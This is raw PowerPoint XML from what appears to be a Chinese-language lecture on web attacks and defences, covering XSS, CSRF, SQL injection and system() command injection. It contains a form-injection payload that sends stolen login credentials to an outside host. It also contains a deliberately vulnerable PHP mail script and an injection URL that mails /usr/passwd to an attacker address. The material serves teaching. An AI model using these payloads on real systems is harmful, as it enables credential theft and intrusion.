              </a:rPr>
              <a:t>=`https://bank.com/login` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=`steal()`&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;form&gt; action="logon.jsp" method="post"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>onsubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>hackImg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=new Image;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    hackImg.src='http://www.digicrime.com/'+document.for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    ms(1).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>login.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'+':'+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(1).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>password.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>;" &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12795067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Shape 256"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Shape 257"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69848">
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>对策</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>编码方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Shape 258"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1600200"/>
            <a:ext cx="8520600" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571497" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用替代表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>标记。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571497" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码的数据在发送到浏览器之前进行编码，则嵌入式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码将由浏览器显示，而不是由它们执行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571497" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; alert(‘XSS’) &lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>转换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;script&amp;gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(‘XSS’)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7860776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讨论</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1676399"/>
            <a:ext cx="8520600" cy="4415433"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Question 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击的主要区别是什么？ 他们的名字都有“跨站点”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Question 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>我们是否可以使用针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击的对策来抵御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>secret token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> same-site cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方法？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285743" indent="-285743"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20557318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总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="8001000" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>较差的输入检查导致允许恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>已知的防御措施能较有效解决问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站请求伪造</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>伪造的请求利用正在进行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>可以被阻止</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>问题源于回应不信任的输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>难以预防</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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609600" y="304800"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的代码注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器端发送邮件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="2105025"/>
            <a:ext cx="7064375" cy="1019175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $email = $_POST[“email”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $subject = $_POST[“subject”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  system(“mail  $email –s  $subject &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>joinmynetwork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3733800"/>
            <a:ext cx="7064375" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  http://yourdomain.com/mail.php?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     email=hacker@hackerhome.net &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     subject=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
